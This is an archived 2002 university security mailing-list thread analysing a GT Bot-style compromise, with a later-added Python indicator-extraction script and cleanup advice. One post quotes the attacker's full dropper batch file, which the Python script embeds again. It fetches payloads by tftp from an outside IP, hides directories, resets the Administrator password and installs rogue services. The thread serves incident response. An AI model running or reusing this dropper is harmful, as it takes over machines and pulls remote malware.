[unisog] Re: Coordinated Scan

Huba Leidenfrost huba at uidaho.edu
Wed Apr 3 17:03:01 GMT 2002


 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We fired off sample copies of what we saw here (as probably did many
of you) to SOPHOS, NAV, & F-Secure.  F-Secure now has detection for
this and I'm sure the others will follow. 

I haven't seen a conclusive writeup.  However it would appear that
this is just another rendition of the global threat (GT Bot) as
mentioned earlier (http://bots.lockdowncorp.com/gtbot.html). 
Although we still don't know exactly what the dropper was I'm
inclined to believe that the reason was simply poor user habits in
terms of surfing and password settings.  All the systems we saw
hacked were 2000 Professional where the user had set their
administrator password to nothing.

   H  u  b  a
- -                                                     
HUBA LEIDENFROST           Systems Security Analyst   
huba at uidaho.edu     Information Technology Services  
University Of Idaho      TEL/FAX: 208.885.2126/7539
http://www.its.uidaho.edu/info-security/runsafe.htm  
 
- -----Original Message-----
From: Mark Newman [mailto:mnx at utk.edu]
Sent: Wednesday, April 03, 2002 7:07 AM
To: jeff_bollinger at unc.edu; Jeff Bollinger; Allen Chang
Cc: unisog at sans.org; security at rescomp.berkeley.edu
Subject: Re: [unisog] Re: Coordinated Scan


Anyone found a conclusive writeup on this?

Mark Newman
University of Tennessee

On Monday 01 April 2002 09:48 am, Jeff Bollinger wrote:
> More on this attack.  Here is the actual .bat file used by the
> attacker which gives some great clues:
>
> ----
>
> @echo off
> c:
> cd c:\winnt\system32\vmn32
> mkdir \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
> attrib +s +r +h \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
> kill sxe*
> kill temp.exe
> del ..\2*.ocx
> del ..\32*.ocx
> del ..\temp2.exe
> PATH=%PATH%;c:\winnt\system32
> move firedaem.exe firedaemon.exe
> del c:\winnt\system32\vmn32.exe
> attrib *.* -r /s
> attrib +s +h +r c:\winnt\system32\vmn32
> attrib c:\winnt\system32\vmn32\asp +s +h
> attrib c:\winnt\system32\vmn32\aspc +s +h
> tftp -i 12.233.26.173 GET ir2.conf c:\winnt\system32\vmn32\asp\ir.conf
> tftp -i 12.233.26.173 GET xir.conf c:\winnt\system32\vmn32\aspc\ir.conf
> tftp -i 12.233.26.173 GET barm8.gif c:\winnt\system32\vmn32\barm8.gif
> attrib *.* -r /s
> net user administrator changem
> net share /delete ipc$
> SET MXHOME=c:\winnt\system32\vmn32
> SET MXBIN=c:\winnt\system32\vmn32
> c:\winnt\system32\vmn32\firedaemon -i Ms32dll "c:\winnt\system32\vmn32" "c:\winnt\system32\vmn32\lsass.exe" "c:\winnt\system32\vmn32\barm8.gif" Y 0 0 Y Y
> c:\winnt\system32\vmn32\firedaemon -i SVHOST "c:\winnt\system32\vmn32\asp" "c:\winnt\system32\vmn32\asp\SVHOST.EXE" "c:\winnt\system32\vmn32\asp\ir.conf" Y 0 0 Y Y
> c:\winnt\system32\vmn32\firedaemon -i MSVC5 "c:\winnt\system32\vmn32\aspc" "c:\winnt\system32\vmn32\aspc\SVHOST.EXE" "c:\winnt\system32\vmn32\aspc\ir.conf" Y 0 0 Y Y
> c:\winnt\system32\vmn32\services start Ms32dll
> c:\winnt\system32\vmn32\services start SVHOST
> c:\winnt\system32\vmn32\services start MSVC5
> echo REGEDIT4  1>>root.reg
> echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> root.reg
> echo "restrictanonymous"="1" >> root.reg
> echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> root.reg
> echo "NTLM"="2" >> root.reg
> regedit /S root.reg
> del root.reg
> services stop tlntsvr
> services delete tlntsvr
> services stop lmhosts
> services start lmhosts
> services start NtLmSsp
> services stop PSEXESVC
> services delete PSEXESVC
>
> Allen Chang wrote:
> > Apologies if I break the thread...
> >
> > Here's my analysis of the compromised computers. First of all,
> > this is not the Backdoor.darkIRC detected by antivirus programs.
> > This backdoor is not detected by the latest NAV patterns.
> >
> > I'm guessing that these computers were compromised through the
> > administrative share with no administrator password on Windows
> > 2000.
> >
> > *A rogue lsass.exe (with a red u and a smaller green d icon) was
> > installed as a service using firedaemon.exe (or firedaem.exe).
> > You can check for it under Administrative Tools -> Services. The
> > one on our hosts was called ms32dll
> > *Several .tmp files and a rudl32.exe are dropped in the Startup
> > folder but the .tmp files don't seem to run.
> > *Serve-U FTP, IRC and telnet servers are run on various ports.
> > The IRC configurations (ir.conf) seem to indicate that they are set
> > up as XDCC file-serving bots.
> >
> > Judging from this, one should be able to remove the service with
> > a "firedaemon -u ms32dll" This seems to close all the opened
> > ports but I am unsure as to what other damage may have been done.
> >
> > On all the hosts, nmap found the following ports open:
> > Port       State       Service
> > 132/tcp    open        cisco-sys <--tlntsvr.exe (telnet)
> > 135/tcp    open        loc-srv <--svchost.exe
> > 139/tcp    open        netbios-ssn <--NetBIOS sharing (normal)
> > 445/tcp    open        microsoft-ds <-Windows sharing (kind of normal)
> > 1025/tcp   open        listen <--mstask.exe (normal)
> > 8888/tcp   open        sun-answerbook <-- sxe5.tmp (backdoor client)
> >
> > Running Vision 1.0 (www.foundstone.com) on the compromised
> > computers yielded these additional ports and programs bound to
> > them:
> > 1029/tcp  <-- sxe5.tmp
> > 1031/tcp <-- sxe5.tmp
> > 43958/tcp <--c:\winnt\system32\vmn32\lsass.exe <-not to be
> > confused with the other lsass.exe from MS
> > 3112/tcp <-- c:\winnt\system32\vmn32\lsass.exe
> >
> > According to vmn\ServUStartUpLog.txt (Not confirmed)
> > 3112 <-- ftp
> >
> > Hidden? (Never seen by me)
> > 99/tcp <-- Backdoor command shell?
> >
> > (**Files Found**)
> > C:\Documents and Settings\All Users\Start Menu\Programs\Startup
> > rudl32.exe
> > sxe3.tmp
> > sxe4.tmp
> > sxe5.tmp
> >
> > Other files mentioned at
> > http://www.theorygroup.com/Archive/Unisog/2002/msg00334.html
> >
> > @llen
> > Network Security
> > Office of Residential Computing
> > UC Berkeley

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPKs1w0pG2S0cMeJwEQLFlACg8TqRo7lO2jLMymLhvEME+CqROfEAoL1M
7H4fhOGU2CbFeKshjk8aZHHm
=8+bO
-----END PGP SIGNATURE-----
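Added example, not part of the archived mail or of any poster's tooling: a small Python triage script that parses the attacker's .bat quoted above and pulls out the indicators a responder would sweep other hosts for (the tftp download host and fetched files, the three FireDaemon service names and the directories they run from, the password reset on Administrator, the ipc$ share removal, and the registry edits written through root.reg). The copy of the script embedded below is constructed sample input: the posted .bat, abridged and re-flowed to one command per line, since the list archive wrapped several lines. The regular expressions are written for this script's command style, not as a general batch parser, and the function and variable names are this example's own.

```python
"""Extract indicators from the attacker's batch script posted in this thread.
Added example, not code from the original mail.  Python 3.8+ (uses :=)."""
import ntpath
import re

# Constructed sample input: the posted .bat, abridged, one command per line.
ATTACKER_BAT = r"""
@echo off
cd c:\winnt\system32\vmn32
mkdir \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
kill sxe*
del ..\2*.ocx
move firedaem.exe firedaemon.exe
tftp -i 12.233.26.173 GET ir2.conf c:\winnt\system32\vmn32\asp\ir.conf
tftp -i 12.233.26.173 GET xir.conf c:\winnt\system32\vmn32\aspc\ir.conf
tftp -i 12.233.26.173 GET barm8.gif c:\winnt\system32\vmn32\barm8.gif
net user administrator changem
net share /delete ipc$
c:\winnt\system32\vmn32\firedaemon -i Ms32dll "c:\winnt\system32\vmn32" "c:\winnt\system32\vmn32\lsass.exe" "c:\winnt\system32\vmn32\barm8.gif" Y 0 0 Y Y
c:\winnt\system32\vmn32\firedaemon -i SVHOST "c:\winnt\system32\vmn32\asp" "c:\winnt\system32\vmn32\asp\SVHOST.EXE" "c:\winnt\system32\vmn32\asp\ir.conf" Y 0 0 Y Y
c:\winnt\system32\vmn32\firedaemon -i MSVC5 "c:\winnt\system32\vmn32\aspc" "c:\winnt\system32\vmn32\aspc\SVHOST.EXE" "c:\winnt\system32\vmn32\aspc\ir.conf" Y 0 0 Y Y
c:\winnt\system32\vmn32\services start Ms32dll
c:\winnt\system32\vmn32\services start SVHOST
c:\winnt\system32\vmn32\services start MSVC5
echo REGEDIT4  1>>root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> root.reg
echo "restrictanonymous"="1" >> root.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> root.reg
echo "NTLM"="2" >> root.reg
regedit /S root.reg
services delete tlntsvr
services delete PSEXESVC
"""

# Patterns tuned to the command forms seen in this script (assumption: one
# command per line, FireDaemon called with -i NAME "workdir" "exe" "args").
TFTP = re.compile(r"^tftp\s+-i\s+(\S+)\s+GET\s+(\S+)\s+(\S+)", re.I)
FIREDAEMON = re.compile(r'firedaemon(?:\.exe)?\s+-i\s+(\S+)\s+"([^"]*)"\s+"([^"]*)"\s+"([^"]*)"', re.I)
SERVICES = re.compile(r"services\s+(start|stop|delete)\s+(\S+)$", re.I)
NET_USER = re.compile(r"^net\s+user\s+(\S+)\s+(\S+)", re.I)
NET_SHARE_DEL = re.compile(r"^net\s+share\s+/delete\s+(\S+)", re.I)
ECHO_REDIR = re.compile(r"^echo\s+(.*?)\s*1?>>\s*(\S+)$", re.I)   # echo ... >> file
REG_KEY = re.compile(r"^\[(.+?)\\?\]$")                            # [HKLM\...\]
REG_VALUE = re.compile(r'^"([^"]+)"="([^"]*)"$')                   # "name"="value"
FILE_OP = re.compile(r"^(del|move|kill|mkdir)\s+(.+)$", re.I)


def extract_iocs(script: str) -> dict:
    """Walk the script once and collect the indicators by type."""
    iocs = {
        "download_hosts": set(),      # tftp servers the dropper pulls from
        "downloaded_files": [],       # (remote name, local path)
        "services_installed": [],     # (name, workdir, exe, args)
        "service_actions": [],        # (start|stop|delete, name)
        "credential_changes": [],     # (user, new password)
        "shares_removed": [],
        "registry": {},               # key -> {value name: data}
        "file_ops": [],               # (del|move|kill|mkdir, operand)
    }
    current_key = None                # last [key] echoed into the .reg file
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := TFTP.match(line):
            iocs["download_hosts"].add(m.group(1))
            iocs["downloaded_files"].append((m.group(2), m.group(3)))
        elif m := FIREDAEMON.search(line):
            iocs["services_installed"].append(m.groups())
        elif m := SERVICES.search(line):
            iocs["service_actions"].append((m.group(1).lower(), m.group(2)))
        elif m := NET_USER.match(line):
            iocs["credential_changes"].append((m.group(1), m.group(2)))
        elif m := NET_SHARE_DEL.match(line):
            iocs["shares_removed"].append(m.group(1))
        elif m := ECHO_REDIR.match(line):
            payload = m.group(1)      # what gets written into the .reg file
            if k := REG_KEY.match(payload):
                current_key = k.group(1)
                iocs["registry"].setdefault(current_key, {})
            elif (v := REG_VALUE.match(payload)) and current_key:
                iocs["registry"][current_key][v.group(1)] = v.group(2)
        elif m := FILE_OP.match(line):
            iocs["file_ops"].append((m.group(1).lower(), m.group(2)))
    return iocs


def suspicious_dirs(iocs: dict) -> set:
    """Directories to sweep: service working dirs plus where downloads land."""
    dirs = {wd for _, wd, _, _ in iocs["services_installed"]}
    dirs |= {ntpath.dirname(local) for _, local in iocs["downloaded_files"]}
    return {d.lower() for d in dirs}


if __name__ == "__main__":
    found = extract_iocs(ATTACKER_BAT)
    for section, items in found.items():
        print(section, ":", items)
    print("sweep dirs:", sorted(suspicious_dirs(found)))
```

Two things the parsed output makes hard to miss when planning cleanup: the script resets the Administrator password (`net user administrator changem`) and removes ipc$, kills the telnet service and deletes the PSEXESVC service, and sets restrictanonymous=1, so the attacker closes the blank-password hole behind them and a cleanup that only removes the FireDaemon services (`firedaemon -u ms32dll` and the other two) still leaves a known password on the box; reset it. The three directories returned by `suspicious_dirs` are also the ones the script marks +s +h, so a plain directory listing on the host will not show them.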